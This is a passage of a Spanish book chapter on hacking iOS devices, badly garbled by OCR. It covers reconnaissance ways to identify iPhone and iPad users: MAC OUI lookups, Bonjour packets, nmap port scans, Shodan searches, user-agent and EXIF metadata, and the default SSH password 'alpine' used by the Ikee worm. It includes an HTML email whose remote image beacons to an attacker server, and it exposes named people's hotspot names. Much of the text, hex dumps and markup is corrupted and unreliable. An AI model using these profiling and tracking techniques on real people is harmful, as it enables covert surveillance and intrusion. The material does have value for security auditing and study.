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Capítulo  L  Identificando  dispositivos  ¡OS 

Capítulo  I 

Identificando  dispositivos  iOS 


l.Identífícación  de  dispositivos  Apple 

Tras  la  lectura  de  este  libiOj  conocer  cuáles  son  los  objetivos  potenciales  a  la  hora  de  realizar 
peníesting  a  un  dispositivo  Apph  será  fiindamentaL  Hn  este  capítulo  eo  concreto  se  van  a  mostrar 
las  diversas  formas  de  identificar  a  las  personas  que  utilizan  dispositivos  iOS  (ya  sea  iPhone^  iFaá 
o  iPod  Toiich)  en  su  día  a  día.  Esto*  añadido  a  las  políticas  de  BYGD  {tiring  Ibur  Own  Devicé) 
muchas  conipañíaSj  permitirá  saber  qué  esquemas  se  utilizan  y  a  quiénes  se  deben  aplican 


Descubriendo  dispositivos  iOS  en  la  misma  red  local 

En  esta  primera  paite  del  capítulo  se  va  a  supíincr  que  se  busca  dentro  de  la  red  aquellos  dispositivo^i 
iOS  conectados.  Esto,  en  caso  de  estar  realizando  una  auditoría  de  seguridad  de  red,  permitirá  acotar 
übjelivos  para  esquemas  de  ataque  que  se  verán  a  posLeriori. 


Par  las  direcciones  M4C 

Uip  dé  las  formas  más  sencillas  de  identíñear  un  diKposiEivo  es  á  través  de  la  dirección  MAC; 

Las  AMCAddí^css  que  se  ulilizan  en  ios  equipos  tiene  unos  bits  dedicados  al  fabricante  de  las  tarjetas. 
Estos  bils  se  llaman  OUI  (OiganitaúonúUy  Unique  Jdenílfter)  y  definen  la  compañía  que  ha  creado 
el  hardware.  En  los  equipos  de  Apple,  como  las  larjetas  son  fabricadas  por  ellos  mismos,  es  fácil 
identihear  a  un  equipo  c{>mo  un  Apple,  lo  que  puede  ser  muy  útil  en  detenninadas  íjcasioncs. 

La  mayoria  de  las  aplicaciones  de  seguridad  de  red,  como  snl/fers  o  cscáncrcsj  llevan  incluida  una 
base  de  datos  de  OUl  para  Imcer  mucho  más  cómoda  la  visualización  de  datos,  pero  si  no  es  así,  hay 
henamientas  que  permiten  la  ct>nsulta  online,  ayudando  así  a  saber  si  una  M/íCAddress  jicrícnccc  a 
un  equipo  Apple  o,  cuales  son  los  OLI  de  Appie,  por  poner  dos  ejeiiiplos. 

Un  ejemplo  de  dicha  consulta  oniine  puede  le  al  izarse  on  esta  \JR\:  hítp:/Adñm’& 
Jind/?strmi^-app¡e 
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Vendor/Ethernet/Bluetooth  MAC  Address  Lookup  and  Search 

Match  yoLjr  MAC  address  co  Ets  vender. 

Match  a  verdor  te  thc  MAC  adeiresse;;  it  uses. 

MAC  Address  or  Vendar  to  look  tor:  !  '  |  j  atiinj'j 

Ly  VEinlijr.  Fui  «Aiaj  i^le:  ^¿Dp  lc'or  'allicd' 

Seanch  hv  UKtJ  Add  ress .  hor  exan?  c:  I  J[AS-"  D "  ‘VS-SO-CT’  or  ^ÓCrtJ4'2&" 

rfvou  wanl  t«  loükup  WsC  fint  E  THIT-Of^',  *r  full  MHí  addreaa  TÜ&íWiy:ÍJ2íO  I  íFC*. 

OdFEiiaf  Q  ^  jl  updatEd:  telíruar/ 1  ^  fO 

Search  results  for  "apple"  (Total:  54) 


pT«fnc 

- - - - - - - - - - - - -  .X  u  t 

Vsndar 

QODOI  Iwfibstar  CDmpiitiCf  Corporation  AyipIfeifl^kjEThgrri&t  C5tgW5V 

93  iAppla  Cütnpüber.  Inc. 

Ó0ÜSG2 

Apple  Coinpitter.  Inc.  ÍPCt  bus  Macs> 

«OOA27 

Apple  Computer.  Inc. 

€QQAS> 

ADOle  Computer.  Inc. 

C30DS3 

Apote  Computer.  Inc. 

031 OF A 

Ad  ole  1  nc  fwal:  .  tficl 

OOl  iZ4 

Ansie  CoruBuier.  Ir  c. 

Imíigfiri  OI  .01 :  Dii-BcdoTieEi  MAC  uüüzaíks  por  Áppie. 


Además  de  poder  identificar  a  un  dispositivo  Apple  en  la  red  en  la  que  se  está,  Lambicii  es  posible 
modifiear  la  propia  dilección  MAC  de  algunos  dispositivos  para  suplantar  a  otro  fabricante  o  incluso 
a  otro  sistema  operativo,  A  efectos  prácticos,  cualquier  adniinisírador  de  red  avanzado  será  capaz  de 
utilizar  más  lieiTamientas  para  descubrir  el  engaño,  pero  esto  puede  servir  en  algunas  siluaduiLcs. 

Además  hay  un  detalle  interesante  sobre  las  direcciones  MAC  en  e^tos  dispositivos  iO^X  y  es  que  la 
dirección  M  AC  tic  la  taijcla  Rluetooih  suele  set  siempre  secueocial  a  la  dirección  MAC  de  la  tarjeta; 
inalámbrica*  liste  dato  es  muy  interesante  porque  cierto  tipo  de  ataques  Bkieí(jo¿h  necesitan  saber  la 
dirección  MAC  de  anlemariO.  Por  ejemplo,  en  un  íPad  concreto  se  tienen  las  siguientes  direcciones 
MAC! 


Tarjeta 

Dirección  MAC 

1  n  al  ám  bri  c  a  (  Wi  -Ft) 

B8:C7;5D:E0:0B:9E 

Blueiooh 

RR;C7:5D:F.0:flB:9F 

Tabla  01. 01.  DksGcion’É^  Gorisecutivaíi  sn  un  dispositivo  íPad 


Por  el  protocola  Bnnjour 

Todos  los  dispositivos  Apple  utilizan  nn  protocolo  denoTninado  (aiiterioimente  llamado 

Rendezvüi^v)  que  se  utiliza  paia  descubrir  servdcios  en  una  red  de  área  local,  y  de  esta  foTma 
autoconfigurar  muebos  de  estos  servicios  sin  la  interacción  del  usuario. 


Capítulo  i.  Identificando  dispositivo:^  ¡OS 
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Jr'ara  que  pueda  flraciOTiar  de  forma  correcta,  Borrjour  envía  muchos  paquetes  eii  la  red  arvunciaritk} 
ios  servicios  que  cada  dispositivo  ofrece,  u  símpleineiile  anunciando  la  existencia  de  los  mismos.  Jdn 
el  caso  de  ctiíilquicr  disposiLívíj  con  íOS^  esto  siempre  se  cumple,  con  lo  que  es  una  importante  pista 
que  indica  que  se  esrá  ante  un  dispositivo  de  estas  características. 


Cualquier  iFhone  o  ¡Pad  envía  una  serie  de  paquetes  Boryour  cada  vez  que  se  euríccLa  a  una  red 
W¡-Fi.  Bonjcfur  utiliza  el  prolocolu  DNS  para  sus  paquetes,  con  la  ligera  diferencia  de  que  usa  el 
piiertí)  UDP  5Í5]  en  lugar  del  puerto  53  que  suele  utilizar  DNS  de  forma  normal.  Además,  utiliza 
direcciones  multicast  (generalnieiate  la  224,0,0,251)  paia  poder  enviar  sus  mensajes  y  que  de  esta 
forma  lo  récibaii  iodos  los  dísposilívus  couccladofc  a  una  red  local. 


En  los  paquetes  Brmjour  enviados,  es  posible  encontrar  detalles  interesanreSj  como  el  nombre  del 
dispositivo,  y  las  direcciones  lPv4  e  lPv6  de  los  mismos.  La  siguiente  captura  muestra  un  paquclc 
^ójifour  de  un  ¡Pad: 


IP  10.0.1.6.5353  >  224.0.0.251.5353:  0»-  [Oq]  8^0/5  (C^he  ílush)  TXl . .  PTR 

_£pple-iii!Qbd^i.^  _tcp.  local .. ,  PTR 

bS  . c7 :  5d : eO ;  Ob :  eBO  :  bac7 ' 5df  f  :  f =e0  ;b9e .^apple-iuobdeiT  ._tcp .  lcca.l . ,  ( CRche 

fliidi)  PlíV  Familv^iPs^d.  local .  :  É207S  0  0,  (Caclje  ilu^)  PTR  F^milys— 
iPad.  local..  CCachs  fiush)  PTR  B'ajiftil7S-iP*ad.  local .  .  (Caclie  flush)^A4M 
feSO:  :bac7:5dff  :f^0:b9e.  (Caclit  k  10.0.1.6  (437) 


Os 00 00 

4500 

Oldl 

cOGb 

0030 

fí  11 

Odaf 

OaOO 

0106 

E  ,  k . 

OiiOOlO 

eOOO 

0G£b 

14e9 

14e9 

Olbd 

Dld2 

OOOO 

8400 

OKOQzn 

DOGO 

OCDB 

Donn 

0005 

2a62 

3G3a 

6337 

3a35 

. *b8  .c7;5 

0x0030 

643a 

6530 

3a30 

623  a 

3965 

4066 

6538 

30  3a 

d  :e0  :  Oh: 

0x0040 

3aÉ2 

616  3 

373a 

3564 

66  66 

3a66 

6565 

303a 

: bac? : 5d£f : feeO : 

0x0050 

6239 

650d 

5f61 

7070 

6c  65 

2dSci 

6f  62 

6465 

b9e  _Bpple^jíiobde 

OxOOéO 

7É04 

S£7  4 

6370 

056c 

6£  63 

61  Se 

0000 

1080 

V  ._tcp  .  local .... 

0x0070 

0100 

0011 

9400 

DIGO 

09  Bf 

7365 

72  7É 

6963 

.  ,  Síervic 

OxOOSO 

6573 

075f 

646e 

732d 

7364 

045f 

7564 

70c0 

es.  (lii&-sd.  tüip. 

0x0090 

4a00 

OcOO 

0100 

0011 

9400 

02c0 

3?cD 

3700 

J . 7.7. 

0x0  OaO 

OcOO 

0100 

0011 

9400 

G2cD 

OccO 

OcOO 

2190 

i 

OxDObO 

0100 

0000 

730  0 

1500 

COCO 

00£2 

7e0c  4661 

.  .  .  .X . ■'-■.Ea 

UxODcO 

6óh3 

6c?  9 

732d 

6950 

6164 

cri4a 

0145 

0139 

Bi  i  Ivs-iFbd  J  -  E .  9 

0x0  OdO 

0142 

0130 

0130 

0145 

0145 

0146 

0146 

0146 

.B.Ü.D .E.E.F  F.F 

0x0 OeO 

0144 

0135 

0137 

0143 

0141 

0142 

0130 

0130 

.D.5.7.C.A.B.0.0 

OxOOfO 

0130 

0130 

013  0 

0130 

GIBO 

0130 

0130 

0130 

. D.o.D .0.0. n  n  0 

OxOlGO 

0130 

0130 

0130 

0138 

C145 

0146 

0369 

7036 

.0.0.0,8.E.F.ip6 

OxÜllO 

0461 

7270 

610  0 

DOOc 

6DG1 

0000 

0078 

0002 

.arpa . x,  , 

0x0120 

cOal 

0136 

0131 

0130 

C231 

3007 

69  6e 

2d61 

. . .6.1 .Ü.lü .in-^ 

0x0130 

6464 

72c0 

£400 

0c80 

0100 

0000 

7800 

02c0 

ddr . ü.  .  . 

0x0140: 

:  alcO 

alOO 

lc3  0 

0100 

DOGO 

7800 

lote 

8UUU 

. X  .  . 

0x0150: 

0000 

0000 

OOba 

c75cl 

ff  fe 

eOOb 

9cc0 

al  00 

. ] . 

0x0160 

ÚIOD 

0100 

000  0 

7000 

04  Oa 

0001 

06c0 

OcOO 

. X . 

0x0170 

2£30 

0100 

00  i  1 

9400 

09c0 

OcOO 

0500 

0080 

/ 

OxOlBO 

0040 

cObO 

002  f 

8001 

0000 

0078 

0006 

cObO 

.@.  .  V . X.  .  .  . 

OxOlBO 

0002 

0008 

□106 

002f 

8001 

00  00 

0073 

DO  06 

. . X . 

0x0 laü 

cío  6 

0002 

0038 

cOal 

a02f 

SO  01 

0000 

0078 

. . X 

0x0 IbU 

0008 

cUal 

CIUÜ4 

4000 

ODOB 

0000 

2905 

aDDD 

.  ) 

0x0 IcO 
0x0 IdO 

0011 

Oe 

9400 

OcOO 

0400 

0800 

£9bB 

c75d  eOOb 

. ].. 

Imap’en  0 !  .02:  Criptiira  de  iiti  paquete  de  Ronfintí . 

De  igual  fonna,  también  se  pueden  hacer  peticiones  al  3er\ucio  /íoít;d£/r  (inDNS)  del  dispositivo  que, 
en  caso  de  respuesta,  pennitirá  conocer  el  nombre  del  mismo;  para  ello,  como  se  ha  mencionado 
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que  Bonjaur  utiliza  DNS,  es  posible  usar  una  herramienta  como  t/jgpara  hacer  la  petlcióm  con  las 
caracierísticas  que  se  cotneiitaron  amerionneiite;  dirección  nmüica.s!  224.0.0,251  y  piicrlo  5353. 


di^©224  ri.Q  251  -s  10.il.  1.6 

:  <c>>  DiC  9.B.'.--P1  «>>  ®224,0.a  -tj5353  -íí  10.0.1.6 

;  [1  ííHZ'ver  foimd) 

clobaj.  optiaio:  -H-mJ 

^  ■  ^>HEZDER-!:<“  □pcodsi  ÜíIERíí.  stazuE'  N0Er3Ok.  iil: 

;;  í:^  í  ai;  ai^.  1  ¿HSVEE:  1,  A11TRGEI-T:  0.  ¿DDITIOMAl.  3 


-  QüESTIOH  GEETIOlí 
;S -1.0  .  10-3-n  üHrh-.aipa. 

; .  M15ÜO  SECTION  : 

É  .  1 . 0 . 1 1  1  ri-íddidr .  arpa , 


IG 


IH 

IK 


FTR 

FTR 


■  -oca.1 . 


Cljerv  tiiiL=:  VÜ  31*36(7 
3EEVER:  10  Q .  1  .  6!FE3G3  Í224 . 0  0  251) 
líHER:  ¿pr  11  19:2H:45  2013 

MJG  SIZE  zc\fn_71 _ _ 


ImageE  ííi  .03:  Can^ülta.^ii^M  de  Boiyow. 


Por  los  puertos  TCP  abiertos 

En  un  dispositivo  iOS  normal,  (sin  Jmlbreak),m  solo  existe  un  puerto  TGP  escuchando;,  eso  puerto, 
es  el  62708,  que  es  el  utilizado  para  la  sincronización  entre  iTtme^  y  cualquier  dispos.itivo  /OS,.  Fs 
decir,  que  si  se  dispone  de  un  dispositivo  que  tiene  el  puerto  TCP  6271)8  abierto,  es  muy  probable 
que  sea  un  dispositivo  iOS.  Nmap  por  ejemplo,  también  es  capaz  de  identificar  un  dispositivo  /05  si 
tiene  este  puerto  abierto,  (esto  es  debido  a  que  !^map  necesita  tener  al  menos  un  puerto  abierto  para 
poder  hacer  lodos  los  tests  de  detección^ 


_-o:n’ 


STATE  EEE?\aCE 


VERSItÜÍ 


R2073/tcp  qpen  ipnons^yit:? 

HAC  Address:  JC:74  r;2:M:43  :D8  Upci'le)  ^  zi  ■  j  +  i 

faminq:  OeSi..aii  rssriilt^E  Fia?  be  um-h¡l  lalalé  because  "vie  qkuIm  210 1  .inl  at  ie^t  1 

'□pean  cu'irl  1  cinsed  port 

DbíiricDe  type:  Tuedia  (to^icelijlinne 

Running:  Apple  iOB  4.X|5  X|e  K 

es  ZUl :  epe  '^'q  :  appie:  i pbanet_QE :  4  epe :  '  ^pjjIb  :  y .  4 

epe :  ‘^"■o :  atppie :  11  itions^os  :  5  epe :  :  ejppl  j-]^on^os :  G  ■  re  /  9 

ce  ctteiliT  Apple  Mac  CG  :í  IC.d  n  -  1C.S.2  íhüimtain  Ii.m)  ca:  iCS  4.4  2  - 
b .O.fi  (Darvin  ll,3.0  -  12.2.G) 


Imagen  ÜI 3^:  litado  de  escaaeo  límap  h  nj]i  iOS., 


Además,  eu  el  caso  de  que  un  usuario  haw  realizado  un  .hilbrealcáe  su  tenm'nál,  es  posible  también 
que  haya  instilado  el  paquete  OpenSSH  que  painite  ia  gestión  remoto  del  dispositivo  a  navés  de 
SSR.  Por  detecto,  existen  dos  usuarios  en  el  dispositivo  que  poseen  siempre  la  misma,  contraseña, 
son  los  usuarios  moi  y  mabile,  cuya  contraseña  es  ai/j/ng,  por  lo  que  en  caso  de  existir  un  demonio 
SSH  con  estos  usuarios  y  contraseñas  puede  indicar  que  es  iin  dispositivo  iÜS 


De  hecho,  uno  de  los  primeros  gusanos  pa  ra  ¡í7S,  /Aec,  utilizaba  esto  técnica  para  encontrar  e  infectar 
todos  1().s  dispositivos  iOS  que  oneoutraba.  rtásicamontc  buscaba  dispositivos  con  el  puerto  de  SSH 
(22,'tcp)  activo  en  los  rangos  de  red  usados  por  las  opera.(!oras  para  3ü.  Una  vez  que  encontraba 
alguno,  probaba  a  entrar  entilo  usuario  ípoí  y  enntraseüa  atpine,  para  poder  iníectarlo. 
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utilizando  Shodan 

También  es  posible  enconüar  leraiinaks  iOS  en  Internet  mediante  uno  de  los  buscadores  favoritos 
de  muchos  usuarios:  Shodan.  Fr  el  momento  de  escribir  estas  líneas,  si  se  busca  k  palabra  ¡Phone 
en  el  buscador  aparecen: 

-  8  íPhúnes  con  servidor  FTP 

1 6  8  ¡Fh  Qñ  es  c  o  ti  servid  or  web 


Mftlr  Fxp  i:ii"s 

Rftsetrth 

Viífeijts  Annlversarv  Promoflrn 

■i  SHODAN 

U  1 D  dF  üdwy 

Indeac  of  / 

HTTP 

161 

5fi.S3.Z3.7I] 

P™Ml*r  Cnnmtf^Bllena 

HTTR'Í  JO  2EÍ0  OK 

HtTP  Afismata 

3 

Adriec  2013 

3ÍáB 

Si 

3ea>«liMi 

t5®7 

*4k  t)o50-B3-J'3-70.biflivp*.frofiUirrMLiwÍ 

Ilitr;-  'ITm  .  1  ]  A|ie  301 3  06^;[13  ÍIMT 

SartHf  ■  IPiai»  Wtib  i 

Top  Cciuntrí«s 

Imagen  01.05:  DispDSttívríS  con  stírviUpr  web., 

También  es  posible  encontrar  un  ejemplo  de  iin  servidor  mal  configurado  donde  se  puede  acceder  a 
todo  el  contenido  de  un  iPhone: 


Index  of  / 

NauÉ 

Ldst  ModMSed  Slze  T  rpe 

Diiecttjry/  -  Daeclinj 

Appücñtini^' 

301 3-Mai-22  Ü 1 :43  OA-  Diretííiiy 

Docu^gnlS/ 

201 3- Apr^jy  23  ■2Sn9-  nisecíoíy 

Libian^/ 

301 3-Maj-27  0!  .2ti33^  Dlrcaoiy 

3D1 3-Mar4Vl  20:29l21-  Ditcciccv 

iofWarü 

301 T  -OcS-06  03  !31  M  04  Kapplicaüco/üctet-^tKa^ 

¡tppbvnc 

301 3-jHn-L3  22:55:25  0.0Kapplkalk:ii]Aíclet-&tieam 

klmlHTif 

3012-Jaii-1222:55LE5  OnX^plkalHm/lDCti^tHStiEa^ 

iPhone  Web  Sen-af  (SMSLocfeSys) 

Imageyr  OJ  . 06;  Acceso  a  im  iPtiúne  a.  través  de  ínte-Toot-; 


Evidentemente,  no  es  un  descubrimiento  de  dispositivos  en  k  red  local,  sino  a  tía  ves  de  internet, 
pero  la  posibilidad  de  buscar  en  Shodan  con  el  modificador  net  (perniitiendü  acotar  las  búsquedas  a 
las  direcciones  IP  de  la  red  objetivo),  podría  determinai^  si  alguno  de  ellos  está  siendo  utiliza  en  ella. 


2.  Identificar  si  un  usuario  utiliza  un  dispositivo  iOS 

En  este  cascu  el  punto  de  vista  de  este  apartado  trata  de  reconocer  si  una  persona  está  utilizando  un 
dispositivo  tos  o  no.  En  una  auditoría  de  seguridad  la  aproximación  sería  descubrir  a  los  empicados 
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de  i.ina  empresa,  utilizando  alguna  red  social  profesional  como  Linkedln  y  después  analizar  las 
interacciones  de  esa  persona  en  las  redes  sociales  para  descubrir  si  es  usuario  o  no  de  ¿0.'?. 


Por  el  sistema  de  mensajería  íMessage 

íMessage  es  el  cliente  de  mensajería  que  se  utilizan  tanlo  en  ¡OS  como  en  OSX.  Desde  cualquier 
terniiual  de  ¡OS,  si  el  destinatario  del  mensaje  utiliza  también  el  mismo  sistema  operativo,  en  vez^ 
de  enviar  un  SMS  se  enviará  un  mensaje  por  la  red.  Tanto  la  aplicación  de  iOS  como  la  de  OSX 
permiten  saber  si  ei  destinatario  utiliza  también  ¡Message  íy  por  supuesto,  iOS).  Basta  con  observar 
a  la  llora  de  crear  un  nuevo  mensaje  que  existe  una  pequeña  burbuja  al  lado  del  número  de  telefono, 
que  indícala  que  el  destinatario  soporta  ¡Message'. 


.07:  :C1íct]1j^-  para  OS 


Por  los  clientes  de  redes  sociales  para  iOS 

Existen  muchas  aplicaciones  en  Intertiet  donde  es  posible  identificar  que  una  determinada  persona, 
está  utilizando  un  dispositivo  iOS  debido  al  cliente  que  utiliza  de  esa  aplicación.  Un  caso  muy 
ilustrativo  es  Tivi/rér,  donde  dentro  de  los  metadatos  de  cada  me.e.t  que  se  publican,  se  encuentra 
el  cliente  utilizado  para  ello.  De  esta  tóima,  es  posible  identificar  el  s’stciiia  operativo  que  está 
utilizando  una  persona  simplemente  mirando  este  tipo  de  meladatos. 


En  el  caso  de  FaceBook,  ya  desde  20 1 1  cambiaron  la  información  que  se  oifecía  al  incluir  contenido 
en  la  red,  pasando  de  “vía  iPkofté'  a  “via  FaceBook  moW/í?”.Por  ejemplo,  Justo  cuando  Actí 

fue  nombrada  Directora  Creativa  Global  de  BlackBeny,  publicó  algún  PA-eet  donde  se  podía  ver  que 
había  sido  enviado  desde  un  iFhone.  Más  larde  lo  intentó  arreglar  diciendo  que  su  ciienla  había  Sido 
comprometida. 


FBhnmry  11, 2013  4t  AH 

vis  Twrtíflf  tw  iPhoí» 

Started  trom  the  beítom  now  wera  here! 

;  o  .  ★  i  Ei  1 

^  Alicia  Keys 

^  _ _ _ 

JjmagcE  01,08:  desde  un  iFñopié.  . 


Capitulo  L  Identificando  dispositivos  IOS 
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Por  el  User-Agent  del  navegador 

Otni  de  formas  comunes  de  poder  detectar  si  alguien  está  usando  un  dispositivo  iOS  es  a  través 
de  las  cabeceras  IH ITP,  concretamente  el  Üser-Ágí^nL  De  hecho,  es  interesante  comeiitui  que  en  esta 
t^>ecera  se  incluye  ¡nformación  hasta  de  la  versión  del  sistema  operativo  que  está  siendo  utilizado. 
Si  se  lleno  por  ejemplo  una  petición  reciente  como  esta: 

Kozill£/5j}  íiPad;  CPU  OS  '  i  OS  X)  AppleK°b:<i^/53  £ .  2  6  {KETKL,  like 

ScTclto)  Vcr3Íon/6.D  MofoiCe/ I0n32  3  Safari/ 853  u  .  2.1 


Se  puede  apreciar  daianiente  el  modelo  [iPad),  la  versión  del  sistema  operativo  {6J3\  así  como 
las  versiones  del  uavcgailor  Safari. 

heebíí  hasta  Coagle  y  otros  buscadores  tanibién  navegau  por  Internet  simulando  que  sm 
dispositivos  QQii  iOS,  puesto  que  existen  algunas  webs  que  dependiendo  del  sistema  operativo  del 
diente,  presentan  un  ccmtenido  u  otro.  Por  ejemplo  Googit^  utiliza  el  siguiente  User-Agent  para 
simular  ser  un  disposinvo  iüS\ 

MqzíI  .1  ;^/5 .  o  (-i  Pnone;  U;  CPU  iPnone  0£  4_1  like  Mac  OS  X;  en-uí;)  Aprjl  eXchKit/bJ2  .  9 
(KIÍTML,  like  Gecko)  Version/M  .  3 . 1  HobML’/yBll?  Safari/ 6531 . 22 . 7  (compatible;  (400- 
O  i  ebü  L  -Xot:  lie  /  2.1;  tkt  tp :  /  /  ví ww .  ooc  gle  .  ccai/hoT. .  hr.TT:  1  ) 


ESsíeri  algunos  navegadores  (aparte  de  Safai^)  en  los  que  sí  que  es  posible  cambiar  el  User-ÁgeM¿ 
Web  Browser,  iCuh  Jdohile.  ú  Diigo  Web  Browsef^pa:o  no  es  posible  hacerlo  en  el  navegador 
Apple  Safari  ^  no  ser  que  el  teléfono  tenga  JaUbreak. 


I 


m  +  <f-  I 

(dentify  Browser  As 


DafauSt  -  lloidlii 


t 

UoHái*  -  IPlKin* 

Mobito  3«fari  -  iP«d 

- 1 

Safari  Desktop 

3 

Pn 

WapDevic« 

p-  Phoí 

i 

FÉmlox  3 

kftemat  Explorar  6 

^SepTQcicu 

imarriet  Explorer  7 

[■ 

HHntMj 

L 

brternut  Explorar  S 

t.  Firct  i 

TniagtsiL  01.09:  iviuílipks  User-  Agem  en  navegadores  iÜK. 


Ilackmg  de  dispositivos  iOS:  iFhone  dí:  iPad 


is 


El  diente  de  correo  de  iOS 

El  cliente  de  correo  que  existe  por  defecto  en  iOSi  se  liama  MobileAíail,  y  también  es  posible 
aprovecharse  de  algunas  de  sus  características  para  poder  identiíicar  sí  un  usuario  esta  utUlzando 
este  sistema  operativo. 

En  caso  de  tener  acceso  a  algún  correo  del  usuario  del  que  kc  quiera  conocer  si  útil  iza  rOSj/una  de  las 
formas  más  sencillas  seria  ver  las  cabeceras  del  correo.  MobtleAíail  suele  usar  una  cabecem  como 
la  siguiente: 

X^MaíleL":  iPhone  Mail  (]GBl4'íl) 

Pero  no  siempre  será  posible  acceder  a  un  coireo  de  este  usuario.  Una  opción  más  interesante  es 
aprovechar  una  configuración  por  defecto  que  tiene  MubileAíail  en  la  que  automáticamente  carga 
todas  las  imágenes  que  tenga  el  correo  electrónico.  De  esta  forma,  un  atacante  podrá  enviarle  un 
correo  con  una  imagen  incrustada  que  apunte  a  tm  servidor  web  que  controle  dicho  atacante,  y  así 
este  podrá  ver  luego  la  petición  HTTP  que  lealiza  el  usuario  para  descargar  esa  imagen. 

Por  ejemplo,  si  se  crea  un  correo  que  tenga  el  siguiente  contenido: 

<ÍDOCTYPE  html  PUBLIC  “-/7W3C//DTD  XÍUML  1,0  Transitional/ /EN" 
'^ht-pwVww-^-.ví.3.org/t'H/xUtml_/DTD/xliLmll-Líian3Ítional.dtd''> 

<html  xmlns-"http;y/www*w3  .org/Í999/xlitinl"> 

<hesd> 

hi-.rp-eqiii  v="Conten-C'-Type"  conteut="text/tiLml ;  ;;hdr3et'^utf-6'"  /> 
<tltle>Ur7ente</-itle> 

</'heud> 

<bQdy> 

<hl>Alea  jacta.  est</hl> 

<ijng  src="http7/www,níiidominio.  com/chunge.  jpg">  /> 

</hody> 

En  cuanto  el  usuario  reciba  el  correo  y  lo  abra,  automáticamente  intentaiú  cargar  la  imagen,  haciendof 
ía  petición  HTTP  correspondiente,  que  indicará  su  sistema  operativo: 

tll/Apr/2Gl3;20:ll  :56  +0200)  "GET  /chungo. jpg  BTTP/l.O"  404  362  .  0 

fiPhone;  CPU  iPhono  OS  like  Mac  OS  X)  AppleftfetKl  L/536 . 2  6  (KHTHL-,  like  Gecko) 

Koblle/10B144" 

Por  defecto  viene  activada  la  carga  au-lomática  de  imágenes  en  XfobüeMaíI,  aunque  es  posible 
desactivarla  en  la  configuración;  ahora  bien,  en  caso  de  realizar  dicha  desactivación  no  solo  no  se 
podrá  ver  ninguna  imagen  de  ningún  comeo,  sino  que  tampoco  se  cargará  ningún  archivo  JavaScript 
o  eSS,  con  lo  que  la  experiencia  deí  usuario  se  degradará  notablemente. 

Por  último,  laiiibién  es  posible  identificar  a  un  usuario  de  iOS  por  las  famosas  firmas  de  correo  como 
^'Enviado  desde  mi  iPhotie'"  o  “Enviado  desde  mi  iFa¿f\  Una  simple  búsqueda  en  Goagh  en  un 
repositorio  de  listas  de  correo  como  m£i¿Itngl¿^(araMvE.com,  devuelve  más  de  500.000  resultados  de 
correos  con  “SenL  from  my  iPhone''  y  más  de  40.000  de  “Sent  from  my  ¡Pad\ 


C^ipítuh  L  IdentificaFido  ¿íLsposlíivííS  iOS 
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Imagen  OLIO:  Opciones  de  Mobííe  Mail  en  iÓS. 


Imágenes  publicadas 

Otra  opción  para  descubrir  si  im  usuario  utiliza  iOS  es  analizando  los  inetadatos  (EXIF)  ác  ü  iMlquier 
imagen  que  publique  en  Eiternei  (Twi!tei%  Flickr,  FaceBook^  etcétera).  Algunos  sitios  web  eliminan 
estos  meLadatoH,  pero  cu  algunas  ocasiones  sí  que  es  posible  acceder  a  esta  iiilómiacíón.  Por  ejemplo, 
en  el  caso  de  una  fotograila  realizada  por  un  IFkofw,  dentro  de  los  datos  EXIF,  se  pueden  íibservar 
diversos  detalles  que  permitan  identifiear,  (entre  otros  muchos  datos),  el  modelo  del  dispositivo 
empicado: 


Make 

Camera  ■Kedfjl  Xllieic 
Orie:Dtatior^ 
Apertura 
GFS  AlLlLuLirj 
GPS  Li^t.ltndp 
GPS  lonLgit-'jde 
CPS  Frj.LiiLiei: 

Tin.^qe  S  i  7e 


i  AppliS 

:  iPhorie  4 

:  HüJij.züLiLai  [normad) 

:  2.S 

:  17  0,8  ri  Abo  ve  Gea  Level 
:  bü  fJLeq  b'  Ib.  00'^  X 
:  14  deq  25"  Iñ.ruU'  R 

r  50  deg  5"  15.  OG'"  X,  14  deg  25'  lt.2n"  h 
:  2b 


Este  caso  concreto  sucedió  en  la  tuga  de  Joím  McAfJe,  programador  estadounidejise  y  ftindadnr  de 
la  empresa  de  aiiti  virus  McA/ee^  perseguido  por  la  justicia  y  huido  del  país.  Una  fitografía  realizada 
con  el  iPkone  4S  del  periodista  que  lo  entrevistó,  no  solo  dejaba  a  las  ciaras  el  temiuial  íFhone  que 
tisaba,  sino  que  además  se  pudo  verla  iiifomiacion  GPS  de  la  ubicación  en  la  que  se  encontraba,  que 
resultó  ser  Guatemala. 
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Hacking  de  dispositivos  IOS:  iPhone  &  iPad 


Compartición  de  Internet  por  Wi-Fi 

NomiaiiTicnte,  los  tunninales  iPhoné^  acaban  llamándose  '"iPhrme  de.  Antaníd'''  í3  ^^íPhone  de 
es  decir,  el  nombre  del  propietario  del  mismo.  Este  nombre  es  el  que  por  defecto  va  a  utilizar  el 
scnücio  de  hitermt  Tethenng,  o  de  “Compartir  Internet”  a  través  de  iPhom^  para  identificar  la  red 
Wí-F¡  que  se  publica. 

Rsto  puede  traer  situaciones  curiosas  en  algunos  entornos  que  pueden  ajaidar  a  localizar  a  una 
persona  en  una  oficina,  en  una  sala  de  coníerencias  o  en  un  medio  de  ü’ansporte.  Los  comerciales 
más  avispados,  revisan  las  redes  Wi-Fi  que  se  publican  en  los  bares  o  en  las  oficinas,  para  poder 
localizar  si  el  sefior  X,  al  que  tienen  que  visitar,  esta  o  no  por  los  alrededores. 


Wi-Fi:  activado 

Desactivar  W-Fi 

Ninguna  red  seleccionada 

AndroidAP 

iPbone  de  HERMINIO  CANO 

IPhone  de  ROBERTO  PARRRA 

A 

Secureap 

VísíorYMoblle2021 

Acceder  a  otra  red... 

Crear  red,,. 

Abrir  el  panel  de  preferencias  Red... 

Imagen  n  1 . 11 :  I  leminio  Cano  y  Roberto  Parra  présenlos 


Tener  encendida  la  Wi-Fi  en  IPhone  es  algo  que  consume  mucha  batería  y  expone  la  información 
Bhietooth.  En  caso  de  que  se  vaya  a  compartir  Internet,  un  usuario  tiene  la  posibilidad  de  evitar  los 
ataques  inuecesarios  que  pueda  querer  hacerle  cualquier  atacante  cercano,  conectando  el  terminal 
por  USB.  Una  opción  para  un  usuario  que  no  quiera  ser  localizado  y  tenga  que  conectar  el  sendeio 
por  Wi-Fi,  consiste  simplemente  en  cambiar  el  nombre  al  dispositivo  por  algo  que  no  identifique  a 
dicho  usuario,  teniendo  que  acordaise  de  apagarlo  después  de  su  utilización. 


No-tech  hacking 

Por  Último,  siempre  queda  la  opción  más  sencilla  de  todas,  que  no  requiere  de  ninguna  complejidad 
técnica.  Si  se  dispone  de  alguna  foto  del  objetivo  en  díinde  aparece  con  un  IPhone  o  con  un  iPad.  ya 
